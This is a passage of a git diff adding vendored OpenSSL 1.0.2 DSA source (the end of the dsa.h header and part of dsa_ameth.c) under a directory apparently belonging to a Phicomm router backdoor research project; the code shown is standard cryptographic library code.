+                           BIGNUM **rp);
+    int (*dsa_do_verify) (const unsigned char *dgst, int dgst_len,
+                          DSA_SIG *sig, DSA *dsa);
+    int (*dsa_mod_exp) (DSA *dsa, BIGNUM *rr, BIGNUM *a1, BIGNUM *p1,
+                        BIGNUM *a2, BIGNUM *p2, BIGNUM *m, BN_CTX *ctx,
+                        BN_MONT_CTX *in_mont);
+    /* Can be null */
+    int (*bn_mod_exp) (DSA *dsa, BIGNUM *r, BIGNUM *a, const BIGNUM *p,
+                       const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+    int (*init) (DSA *dsa);
+    int (*finish) (DSA *dsa);
+    int flags;
+    char *app_data;
+    /* If this is non-NULL, it is used to generate DSA parameters */
+    int (*dsa_paramgen) (DSA *dsa, int bits,
+                         const unsigned char *seed, int seed_len,
+                         int *counter_ret, unsigned long *h_ret,
+                         BN_GENCB *cb);
+    /* If this is non-NULL, it is used to generate DSA keys */
+    int (*dsa_keygen) (DSA *dsa);
+};
+
+struct dsa_st {
+    /*
+     * This first variable is used to pick up errors where a DSA is passed
+     * instead of of a EVP_PKEY
+     */
+    int pad;
+    long version;
+    int write_params;
+    BIGNUM *p;
+    BIGNUM *q;                  /* == 20 */
+    BIGNUM *g;
+    BIGNUM *pub_key;            /* y public key */
+    BIGNUM *priv_key;           /* x private key */
+    BIGNUM *kinv;               /* Signing pre-calc */
+    BIGNUM *r;                  /* Signing pre-calc */
+    int flags;
+    /* Normally used to cache montgomery values */
+    BN_MONT_CTX *method_mont_p;
+    int references;
+    CRYPTO_EX_DATA ex_data;
+    const DSA_METHOD *meth;
+    /* functional reference if 'meth' is ENGINE-provided */
+    ENGINE *engine;
+};
+
+# define d2i_DSAparams_fp(fp,x) (DSA *)ASN1_d2i_fp((char *(*)())DSA_new, \
+                (char *(*)())d2i_DSAparams,(fp),(unsigned char **)(x))
+# define i2d_DSAparams_fp(fp,x) ASN1_i2d_fp(i2d_DSAparams,(fp), \
+                (unsigned char *)(x))
+# define d2i_DSAparams_bio(bp,x) ASN1_d2i_bio_of(DSA,DSA_new,d2i_DSAparams,bp,x)
+# define i2d_DSAparams_bio(bp,x) ASN1_i2d_bio_of_const(DSA,i2d_DSAparams,bp,x)
+
+DSA *DSAparams_dup(DSA *x);
+DSA_SIG *DSA_SIG_new(void);
+void DSA_SIG_free(DSA_SIG *a);
+int i2d_DSA_SIG(const DSA_SIG *a, unsigned char **pp);
+DSA_SIG *d2i_DSA_SIG(DSA_SIG **v, const unsigned char **pp, long length);
+
+DSA_SIG *DSA_do_sign(const unsigned char *dgst, int dlen, DSA *dsa);
+int DSA_do_verify(const unsigned char *dgst, int dgst_len,
+                  DSA_SIG *sig, DSA *dsa);
+
+const DSA_METHOD *DSA_OpenSSL(void);
+
+void DSA_set_default_method(const DSA_METHOD *);
+const DSA_METHOD *DSA_get_default_method(void);
+int DSA_set_method(DSA *dsa, const DSA_METHOD *);
+
+DSA *DSA_new(void);
+DSA *DSA_new_method(ENGINE *engine);
+void DSA_free(DSA *r);
+/* "up" the DSA object's reference count */
+int DSA_up_ref(DSA *r);
+int DSA_size(const DSA *);
+        /* next 4 return -1 on error */
+int DSA_sign_setup(DSA *dsa, BN_CTX *ctx_in, BIGNUM **kinvp, BIGNUM **rp);
+int DSA_sign(int type, const unsigned char *dgst, int dlen,
+             unsigned char *sig, unsigned int *siglen, DSA *dsa);
+int DSA_verify(int type, const unsigned char *dgst, int dgst_len,
+               const unsigned char *sigbuf, int siglen, DSA *dsa);
+int DSA_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                         CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
+int DSA_set_ex_data(DSA *d, int idx, void *arg);
+void *DSA_get_ex_data(DSA *d, int idx);
+
+DSA *d2i_DSAPublicKey(DSA **a, const unsigned char **pp, long length);
+DSA *d2i_DSAPrivateKey(DSA **a, const unsigned char **pp, long length);
+DSA *d2i_DSAparams(DSA **a, const unsigned char **pp, long length);
+
+/* Deprecated version */
+# ifndef OPENSSL_NO_DEPRECATED
+DSA *DSA_generate_parameters(int bits,
+                             unsigned char *seed, int seed_len,
+                             int *counter_ret, unsigned long *h_ret, void
+                              (*callback) (int, int, void *), void *cb_arg);
+# endif                         /* !defined(OPENSSL_NO_DEPRECATED) */
+
+/* New version */
+int DSA_generate_parameters_ex(DSA *dsa, int bits,
+                               const unsigned char *seed, int seed_len,
+                               int *counter_ret, unsigned long *h_ret,
+                               BN_GENCB *cb);
+
+int DSA_generate_key(DSA *a);
+int i2d_DSAPublicKey(const DSA *a, unsigned char **pp);
+int i2d_DSAPrivateKey(const DSA *a, unsigned char **pp);
+int i2d_DSAparams(const DSA *a, unsigned char **pp);
+
+# ifndef OPENSSL_NO_BIO
+int DSAparams_print(BIO *bp, const DSA *x);
+int DSA_print(BIO *bp, const DSA *x, int off);
+# endif
+# ifndef OPENSSL_NO_FP_API
+int DSAparams_print_fp(FILE *fp, const DSA *x);
+int DSA_print_fp(FILE *bp, const DSA *x, int off);
+# endif
+
+# define DSS_prime_checks 50
+/*
+ * Primality test according to FIPS PUB 186[-1], Appendix 2.1: 50 rounds of
+ * Rabin-Miller
+ */
+# define DSA_is_prime(n, callback, cb_arg) \
+        BN_is_prime(n, DSS_prime_checks, callback, NULL, cb_arg)
+
+# ifndef OPENSSL_NO_DH
+/*
+ * Convert DSA structure (key or just parameters) into DH structure (be
+ * careful to avoid small subgroup attacks when using this!)
+ */
+DH *DSA_dup_DH(const DSA *r);
+# endif
+
+# define EVP_PKEY_CTX_set_dsa_paramgen_bits(ctx, nbits) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DSA, EVP_PKEY_OP_PARAMGEN, \
+                                EVP_PKEY_CTRL_DSA_PARAMGEN_BITS, nbits, NULL)
+
+# define EVP_PKEY_CTRL_DSA_PARAMGEN_BITS         (EVP_PKEY_ALG_CTRL + 1)
+# define EVP_PKEY_CTRL_DSA_PARAMGEN_Q_BITS       (EVP_PKEY_ALG_CTRL + 2)
+# define EVP_PKEY_CTRL_DSA_PARAMGEN_MD           (EVP_PKEY_ALG_CTRL + 3)
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_DSA_strings(void);
+
+/* Error codes for the DSA functions. */
+
+/* Function codes. */
+# define DSA_F_D2I_DSA_SIG                                110
+# define DSA_F_DO_DSA_PRINT                               104
+# define DSA_F_DSAPARAMS_PRINT                            100
+# define DSA_F_DSAPARAMS_PRINT_FP                         101
+# define DSA_F_DSA_BUILTIN_PARAMGEN2                      126
+# define DSA_F_DSA_DO_SIGN                                112
+# define DSA_F_DSA_DO_VERIFY                              113
+# define DSA_F_DSA_GENERATE_KEY                           124
+# define DSA_F_DSA_GENERATE_PARAMETERS_EX                 123
+# define DSA_F_DSA_NEW_METHOD                             103
+# define DSA_F_DSA_PARAM_DECODE                           119
+# define DSA_F_DSA_PRINT_FP                               105
+# define DSA_F_DSA_PRIV_DECODE                            115
+# define DSA_F_DSA_PRIV_ENCODE                            116
+# define DSA_F_DSA_PUB_DECODE                             117
+# define DSA_F_DSA_PUB_ENCODE                             118
+# define DSA_F_DSA_SIGN                                   106
+# define DSA_F_DSA_SIGN_SETUP                             107
+# define DSA_F_DSA_SIG_NEW                                109
+# define DSA_F_DSA_SIG_PRINT                              125
+# define DSA_F_DSA_VERIFY                                 108
+# define DSA_F_I2D_DSA_SIG                                111
+# define DSA_F_OLD_DSA_PRIV_DECODE                        122
+# define DSA_F_PKEY_DSA_CTRL                              120
+# define DSA_F_PKEY_DSA_KEYGEN                            121
+# define DSA_F_SIG_CB                                     114
+
+/* Reason codes. */
+# define DSA_R_BAD_Q_VALUE                                102
+# define DSA_R_BN_DECODE_ERROR                            108
+# define DSA_R_BN_ERROR                                   109
+# define DSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE                100
+# define DSA_R_DECODE_ERROR                               104
+# define DSA_R_INVALID_DIGEST_TYPE                        106
+# define DSA_R_INVALID_PARAMETERS                         112
+# define DSA_R_MISSING_PARAMETERS                         101
+# define DSA_R_MODULUS_TOO_LARGE                          103
+# define DSA_R_NEED_NEW_SETUP_VALUES                      110
+# define DSA_R_NON_FIPS_DSA_METHOD                        111
+# define DSA_R_NO_PARAMETERS_SET                          107
+# define DSA_R_PARAMETER_ENCODING_ERROR                   105
+# define DSA_R_Q_NOT_PRIME                                113
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ameth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ameth.c
new file mode 100644
index 0000000..c142ce7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ameth.c
@@ -0,0 +1,675 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/asn1.h>
+#include <openssl/dsa.h>
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_CMS
+# include <openssl/cms.h>
+#endif
+#include "asn1_locl.h"
+
+static int dsa_pub_decode(EVP_PKEY *pkey, X509_PUBKEY *pubkey)
+{
+    const unsigned char *p, *pm;
+    int pklen, pmlen;
+    int ptype;
+    void *pval;
+    ASN1_STRING *pstr;
+    X509_ALGOR *palg;
+    ASN1_INTEGER *public_key = NULL;
+
+    DSA *dsa = NULL;
+
+    if (!X509_PUBKEY_get0_param(NULL, &p, &pklen, &palg, pubkey))
+        return 0;
+    X509_ALGOR_get0(NULL, &ptype, &pval, palg);
+
+    if (ptype == V_ASN1_SEQUENCE) {
+        pstr = pval;
+        pm = pstr->data;
+        pmlen = pstr->length;
+
+        if (!(dsa = d2i_DSAparams(NULL, &pm, pmlen))) {
+            DSAerr(DSA_F_DSA_PUB_DECODE, DSA_R_DECODE_ERROR);
+            goto err;
+        }
+
+    } else if ((ptype == V_ASN1_NULL) || (ptype == V_ASN1_UNDEF)) {
+        if (!(dsa = DSA_new())) {
+            DSAerr(DSA_F_DSA_PUB_DECODE, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    } else {
+        DSAerr(DSA_F_DSA_PUB_DECODE, DSA_R_PARAMETER_ENCODING_ERROR);
+        goto err;
+    }
+
+    if (!(public_key = d2i_ASN1_INTEGER(NULL, &p, pklen))) {
+        DSAerr(DSA_F_DSA_PUB_DECODE, DSA_R_DECODE_ERROR);
+        goto err;
+    }
+
+    if (!(dsa->pub_key = ASN1_INTEGER_to_BN(public_key, NULL))) {
+        DSAerr(DSA_F_DSA_PUB_DECODE, DSA_R_BN_DECODE_ERROR);
+        goto err;
+    }
+
+    ASN1_INTEGER_free(public_key);
+    EVP_PKEY_assign_DSA(pkey, dsa);
+    return 1;
+
+ err:
+    if (public_key)
+        ASN1_INTEGER_free(public_key);
+    if (dsa)
+        DSA_free(dsa);
+    return 0;
+
+}
+
+static int dsa_pub_encode(X509_PUBKEY *pk, const EVP_PKEY *pkey)
+{
+    DSA *dsa;
+    void *pval = NULL;
+    int ptype;
+    unsigned char *penc = NULL;
+    int penclen;
+
+    dsa = pkey->pkey.dsa;
+    if (pkey->save_parameters && dsa->p && dsa->q && dsa->g) {
+        ASN1_STRING *str;
+        str = ASN1_STRING_new();
+        str->length = i2d_DSAparams(dsa, &str->data);
+        if (str->length <= 0) {
+            DSAerr(DSA_F_DSA_PUB_ENCODE, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        pval = str;
+        ptype = V_ASN1_SEQUENCE;
+    } else
+        ptype = V_ASN1_UNDEF;
+
+    dsa->write_params = 0;
+
+    penclen = i2d_DSAPublicKey(dsa, &penc);
+
+    if (penclen <= 0) {
+        DSAerr(DSA_F_DSA_PUB_ENCODE, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (X509_PUBKEY_set0_param(pk, OBJ_nid2obj(EVP_PKEY_DSA),
+                               ptype, pval, penc, penclen))
+        return 1;
+
+ err:
+    if (penc)
+        OPENSSL_free(penc);
+    if (pval)
+        ASN1_STRING_free(pval);
+
+    return 0;
+}
+
+/*
+ * In PKCS#8 DSA: you just get a private key integer and parameters in the
+ * AlgorithmIdentifier the pubkey must be recalculated.
+ */
+
+static int dsa_priv_decode(EVP_PKEY *pkey, PKCS8_PRIV_KEY_INFO *p8)
+{
+    const unsigned char *p, *pm;
+    int pklen, pmlen;
+    int ptype;
+    void *pval;
+    ASN1_STRING *pstr;
+    X509_ALGOR *palg;
+    ASN1_INTEGER *privkey = NULL;
+    BN_CTX *ctx = NULL;
+
+    STACK_OF(ASN1_TYPE) *ndsa = NULL;
+    DSA *dsa = NULL;
+
+    if (!PKCS8_pkey_get0(NULL, &p, &pklen, &palg, p8))
+        return 0;
+    X509_ALGOR_get0(NULL, &ptype, &pval, palg);
+
+    /* Check for broken DSA PKCS#8, UGH! */
+    if (*p == (V_ASN1_SEQUENCE | V_ASN1_CONSTRUCTED)) {
+        ASN1_TYPE *t1, *t2;
+        if (!(ndsa = d2i_ASN1_SEQUENCE_ANY(NULL, &p, pklen)))
+            goto decerr;
+        if (sk_ASN1_TYPE_num(ndsa) != 2)
+            goto decerr;
+        /*-
+         * Handle Two broken types:
+         * SEQUENCE {parameters, priv_key}
+         * SEQUENCE {pub_key, priv_key}
+         */
+
+        t1 = sk_ASN1_TYPE_value(ndsa, 0);
+        t2 = sk_ASN1_TYPE_value(ndsa, 1);
+        if (t1->type == V_ASN1_SEQUENCE) {
+            p8->broken = PKCS8_EMBEDDED_PARAM;
+            pval = t1->value.ptr;
+        } else if (ptype == V_ASN1_SEQUENCE)
+            p8->broken = PKCS8_NS_DB;
+        else
+            goto decerr;
+
+        if (t2->type != V_ASN1_INTEGER)
+            goto decerr;
+
+        privkey = t2->value.integer;
+    } else {
+        const unsigned char *q = p;
+        if (!(privkey = d2i_ASN1_INTEGER(NULL, &p, pklen)))
+            goto decerr;
+        if (privkey->type == V_ASN1_NEG_INTEGER) {
+            p8->broken = PKCS8_NEG_PRIVKEY;
+            ASN1_INTEGER_free(privkey);
+            if (!(privkey = d2i_ASN1_UINTEGER(NULL, &q, pklen)))
+                goto decerr;
+        }
+        if (ptype != V_ASN1_SEQUENCE)
+            goto decerr;
+    }
+
+    pstr = pval;
+    pm = pstr->data;
+    pmlen = pstr->length;
+    if (!(dsa = d2i_DSAparams(NULL, &pm, pmlen)))
+        goto decerr;
+    /* We have parameters now set private key */
+    if (!(dsa->priv_key = ASN1_INTEGER_to_BN(privkey, NULL))) {
+        DSAerr(DSA_F_DSA_PRIV_DECODE, DSA_R_BN_ERROR);
+        goto dsaerr;
+    }
+    /* Calculate public key */
+    if (!(dsa->pub_key = BN_new())) {
+        DSAerr(DSA_F_DSA_PRIV_DECODE, ERR_R_MALLOC_FAILURE);
+        goto dsaerr;
+    }
+    if (!(ctx = BN_CTX_new())) {
+        DSAerr(DSA_F_DSA_PRIV_DECODE, ERR_R_MALLOC_FAILURE);
+        goto dsaerr;
+    }
+
+    if (!BN_mod_exp(dsa->pub_key, dsa->g, dsa->priv_key, dsa->p, ctx)) {
+        DSAerr(DSA_F_DSA_PRIV_DECODE, DSA_R_BN_ERROR);
+        goto dsaerr;
+    }
+
+    EVP_PKEY_assign_DSA(pkey, dsa);
+    BN_CTX_free(ctx);
+    if (ndsa)
+        sk_ASN1_TYPE_pop_free(ndsa, ASN1_TYPE_free);
+    else
+        ASN1_INTEGER_free(privkey);
+
+    return 1;
+
+ decerr:
+    DSAerr(DSA_F_DSA_PRIV_DECODE, EVP_R_DECODE_ERROR);
+ dsaerr:
+    BN_CTX_free(ctx);
+    if (privkey)
+        ASN1_INTEGER_free(privkey);
+    sk_ASN1_TYPE_pop_free(ndsa, ASN1_TYPE_free);
+    DSA_free(dsa);
+    return 0;
+}
+
+static int dsa_priv_encode(PKCS8_PRIV_KEY_INFO *p8, const EVP_PKEY *pkey)
+{
+    ASN1_STRING *params = NULL;
+    ASN1_INTEGER *prkey = NULL;
+    unsigned char *dp = NULL;
+    int dplen;
+
+    if (!pkey->pkey.dsa || !pkey->pkey.dsa->priv_key) {
+        DSAerr(DSA_F_DSA_PRIV_ENCODE, DSA_R_MISSING_PARAMETERS);
+        goto err;
+    }
+
+    params = ASN1_STRING_new();
+
+    if (!params) {
+        DSAerr(DSA_F_DSA_PRIV_ENCODE, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    params->length = i2d_DSAparams(pkey->pkey.dsa, &params->data);
+    if (params->length <= 0) {
+        DSAerr(DSA_F_DSA_PRIV_ENCODE, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    params->type = V_ASN1_SEQUENCE;
+
+    /* Get private key into integer */
+    prkey = BN_to_ASN1_INTEGER(pkey->pkey.dsa->priv_key, NULL);
+
+    if (!prkey) {
+        DSAerr(DSA_F_DSA_PRIV_ENCODE, DSA_R_BN_ERROR);
+        goto err;
+    }
+
+    dplen = i2d_ASN1_INTEGER(prkey, &dp);
+
+    ASN1_INTEGER_free(prkey);
+
+    if (!PKCS8_pkey_set0(p8, OBJ_nid2obj(NID_dsa), 0,
+                         V_ASN1_SEQUENCE, params, dp, dplen))
+        goto err;
+
+    return 1;
+
+ err:
+    if (dp != NULL)
+        OPENSSL_free(dp);
+    if (params != NULL)
+        ASN1_STRING_free(params);
+    if (prkey != NULL)
+        ASN1_INTEGER_free(prkey);
+    return 0;
+}
+
+static int int_dsa_size(const EVP_PKEY *pkey)
+{
+    return (DSA_size(pkey->pkey.dsa));
+}
+
+static int dsa_bits(const EVP_PKEY *pkey)
+{
+    return BN_num_bits(pkey->pkey.dsa->p);
+}
+
+static int dsa_missing_parameters(const EVP_PKEY *pkey)
+{
+    DSA *dsa;
+    dsa = pkey->pkey.dsa;
+    if ((dsa->p == NULL) || (dsa->q == NULL) || (dsa->g == NULL))
+        return 1;
+    return 0;
+}
+
+static int dsa_copy_parameters(EVP_PKEY *to, const EVP_PKEY *from)
+{
+    BIGNUM *a;
+
+    if ((a = BN_dup(from->pkey.dsa->p)) == NULL)
+        return 0;
+    if (to->pkey.dsa->p != NULL)
+        BN_free(to->pkey.dsa->p);
+    to->pkey.dsa->p = a;
+
+    if ((a = BN_dup(from->pkey.dsa->q)) == NULL)
+        return 0;
+    if (to->pkey.dsa->q != NULL)
+        BN_free(to->pkey.dsa->q);
+    to->pkey.dsa->q = a;
+
+    if ((a = BN_dup(from->pkey.dsa->g)) == NULL)
+        return 0;
+    if (to->pkey.dsa->g != NULL)
+        BN_free(to->pkey.dsa->g);
+    to->pkey.dsa->g = a;
+    return 1;
+}
+
+static int dsa_cmp_parameters(const EVP_PKEY *a, const EVP_PKEY *b)
+{
+    if (BN_cmp(a->pkey.dsa->p, b->pkey.dsa->p) ||
+        BN_cmp(a->pkey.dsa->q, b->pkey.dsa->q) ||
+        BN_cmp(a->pkey.dsa->g, b->pkey.dsa->g))
+        return 0;
+    else
+        return 1;
+}
+
+static int dsa_pub_cmp(const EVP_PKEY *a, const EVP_PKEY *b)
+{
+    if (BN_cmp(b->pkey.dsa->pub_key, a->pkey.dsa->pub_key) != 0)
+        return 0;
+    else
+        return 1;
+}
+
+static void int_dsa_free(EVP_PKEY *pkey)
+{
+    DSA_free(pkey->pkey.dsa);
+}
+
+static void update_buflen(const BIGNUM *b, size_t *pbuflen)
+{
+    size_t i;
+    if (!b)
+        return;
+    if (*pbuflen < (i = (size_t)BN_num_bytes(b)))
+        *pbuflen = i;
+}
+
+static int do_dsa_print(BIO *bp, const DSA *x, int off, int ptype)
+{
+    unsigned char *m = NULL;
+    int ret = 0;
+    size_t buf_len = 0;
+    const char *ktype = NULL;
+
+    const BIGNUM *priv_key, *pub_key;
+
+    if (ptype == 2)
+        priv_key = x->priv_key;
+    else
+        priv_key = NULL;
+
+    if (ptype > 0)
+        pub_key = x->pub_key;
+    else
+        pub_key = NULL;
+
+    if (ptype == 2)
+        ktype = "Private-Key";
+    else if (ptype == 1)
+        ktype = "Public-Key";
+    else
+        ktype = "DSA-Parameters";
+
+    update_buflen(x->p, &buf_len);
+    update_buflen(x->q, &buf_len);
+    update_buflen(x->g, &buf_len);
+    update_buflen(priv_key, &buf_len);
+    update_buflen(pub_key, &buf_len);
+
+    m = (unsigned char *)OPENSSL_malloc(buf_len + 10);
+    if (m == NULL) {
+        DSAerr(DSA_F_DO_DSA_PRINT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (priv_key) {
+        if (!BIO_indent(bp, off, 128))
+            goto err;
+        if (BIO_printf(bp, "%s: (%d bit)\n", ktype, BN_num_bits(x->p))
+            <= 0)
+            goto err;
+    }
+
+    if (!ASN1_bn_print(bp, "priv:", priv_key, m, off))
+        goto err;
+    if (!ASN1_bn_print(bp, "pub: ", pub_key, m, off))
+        goto err;
+    if (!ASN1_bn_print(bp, "P:   ", x->p, m, off))
+        goto err;
+    if (!ASN1_bn_print(bp, "Q:   ", x->q, m, off))
+        goto err;
+    if (!ASN1_bn_print(bp, "G:   ", x->g, m, off))
+        goto err;
+    ret = 1;
+ err:
+    if (m != NULL)
+        OPENSSL_free(m);
+    return (ret);
+}
+
+static int dsa_param_decode(EVP_PKEY *pkey,
+                            const unsigned char **pder, int derlen)
+{
+    DSA *dsa;
+    if (!(dsa = d2i_DSAparams(NULL, pder, derlen))) {
+        DSAerr(DSA_F_DSA_PARAM_DECODE, ERR_R_DSA_LIB);
+        return 0;
+    }
+    EVP_PKEY_assign_DSA(pkey, dsa);
+    return 1;
+}
+
+static int dsa_param_encode(const EVP_PKEY *pkey, unsigned char **pder)
+{
+    return i2d_DSAparams(pkey->pkey.dsa, pder);
+}
+
+static int dsa_param_print(BIO *bp, const EVP_PKEY *pkey, int indent,
+                           ASN1_PCTX *ctx)
+{
+    return do_dsa_print(bp, pkey->pkey.dsa, indent, 0);
+}
+
+static int dsa_pub_print(BIO *bp, const EVP_PKEY *pkey, int indent,
+                         ASN1_PCTX *ctx)
+{
+    return do_dsa_print(bp, pkey->pkey.dsa, indent, 1);
+}
+
+static int dsa_priv_print(BIO *bp, const EVP_PKEY *pkey, int indent,
+                          ASN1_PCTX *ctx)
+{
+    return do_dsa_print(bp, pkey->pkey.dsa, indent, 2);
+}
+
+static int old_dsa_priv_decode(EVP_PKEY *pkey,
+                               const unsigned char **pder, int derlen)
+{
+    DSA *dsa;
+    if (!(dsa = d2i_DSAPrivateKey(NULL, pder, derlen))) {
+        DSAerr(DSA_F_OLD_DSA_PRIV_DECODE, ERR_R_DSA_LIB);
+        return 0;
+    }
+    EVP_PKEY_assign_DSA(pkey, dsa);
+    return 1;
+}
+
+static int old_dsa_priv_encode(const EVP_PKEY *pkey, unsigned char **pder)
+{
+    return i2d_DSAPrivateKey(pkey->pkey.dsa, pder);
+}
+
+static int dsa_sig_print(BIO *bp, const X509_ALGOR *sigalg,
+                         const ASN1_STRING *sig, int indent, ASN1_PCTX *pctx)
+{
+    DSA_SIG *dsa_sig;
+    const unsigned char *p;
+    if (!sig) {
+        if (BIO_puts(bp, "\n") <= 0)
+            return 0;
+        else
+            return 1;
+    }
+    p = sig->data;
+    dsa_sig = d2i_DSA_SIG(NULL, &p, sig->length);
+    if (dsa_sig) {
+        int rv = 0;
+        size_t buf_len = 0;
+        unsigned char *m = NULL;
+        update_buflen(dsa_sig->r, &buf_len);
+        update_buflen(dsa_sig->s, &buf_len);
+        m = OPENSSL_malloc(buf_len + 10);
+        if (m == NULL) {
+            DSAerr(DSA_F_DSA_SIG_PRINT, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        if (BIO_write(bp, "\n", 1) != 1)
+            goto err;
+
+        if (!ASN1_bn_print(bp, "r:   ", dsa_sig->r, m, indent))
+            goto err;
+        if (!ASN1_bn_print(bp, "s:   ", dsa_sig->s, m, indent))
+            goto err;
+        rv = 1;
+ err:
+        if (m)
+            OPENSSL_free(m);
+        DSA_SIG_free(dsa_sig);
+        return rv;
+    }
+    return X509_signature_dump(bp, sig, indent);
+}
+
+static int dsa_pkey_ctrl(EVP_PKEY *pkey, int op, long arg1, void *arg2)
+{
+    switch (op) {
+    case ASN1_PKEY_CTRL_PKCS7_SIGN:
+        if (arg1 == 0) {
+            int snid, hnid;
+            X509_ALGOR *alg1, *alg2;
+            PKCS7_SIGNER_INFO_get0_algs(arg2, NULL, &alg1, &alg2);
+            if (alg1 == NULL || alg1->algorithm == NULL)
+                return -1;
+            hnid = OBJ_obj2nid(alg1->algorithm);
+            if (hnid == NID_undef)
+                return -1;
+            if (!OBJ_find_sigid_by_algs(&snid, hnid, EVP_PKEY_id(pkey)))
+                return -1;
+            X509_ALGOR_set0(alg2, OBJ_nid2obj(snid), V_ASN1_UNDEF, 0);
+        }
+        return 1;
+#ifndef OPENSSL_NO_CMS
+    case ASN1_PKEY_CTRL_CMS_SIGN:
+        if (arg1 == 0) {
+            int snid, hnid;
+            X509_ALGOR *alg1, *alg2;
+            CMS_SignerInfo_get0_algs(arg2, NULL, NULL, &alg1, &alg2);
+            if (alg1 == NULL || alg1->algorithm == NULL)
+                return -1;
+            hnid = OBJ_obj2nid(alg1->algorithm);
+            if (hnid == NID_undef)
+                return -1;
+            if (!OBJ_find_sigid_by_algs(&snid, hnid, EVP_PKEY_id(pkey)))
+                return -1;
+            X509_ALGOR_set0(alg2, OBJ_nid2obj(snid), V_ASN1_UNDEF, 0);
+        }
+        return 1;
+
+    case ASN1_PKEY_CTRL_CMS_RI_TYPE:
+        *(int *)arg2 = CMS_RECIPINFO_NONE;
+        return 1;
+#endif
+
+    case ASN1_PKEY_CTRL_DEFAULT_MD_NID:
+        *(int *)arg2 = NID_sha256;
+        return 2;
+
+    default:
+        return -2;
+
+    }
+
+}
+
+/* NB these are sorted in pkey_id order, lowest first */
+
+const EVP_PKEY_ASN1_METHOD dsa_asn1_meths[] = {
+
+    {
+     EVP_PKEY_DSA2,
+     EVP_PKEY_DSA,
+     ASN1_PKEY_ALIAS},
+
+    {
+     EVP_PKEY_DSA1,
+     EVP_PKEY_DSA,
+     ASN1_PKEY_ALIAS},
+
+    {
+     EVP_PKEY_DSA4,
+     EVP_PKEY_DSA,
+     ASN1_PKEY_ALIAS},
+
+    {
+     EVP_PKEY_DSA3,
+     EVP_PKEY_DSA,
+     ASN1_PKEY_ALIAS},
+
+    {
+     EVP_PKEY_DSA,
+     EVP_PKEY_DSA,
+     0,
+
+     "DSA",
+     "OpenSSL DSA method",
+
+     dsa_pub_decode,
+     dsa_pub_encode,
+     dsa_pub_cmp,
+     dsa_pub_print,
+
+     dsa_priv_decode,
+     dsa_priv_encode,
+     dsa_priv_print,
+
+     int_dsa_size,
+     dsa_bits,
+
+     dsa_param_decode,
+     dsa_param_encode,
+     dsa_missing_parameters,
+     dsa_copy_parameters,
+     dsa_cmp_parameters,
+     dsa_param_print,
+     dsa_sig_print,
+
+     int_dsa_free,
+     dsa_pkey_ctrl,
+     old_dsa_priv_decode,
+     old_dsa_priv_encode}
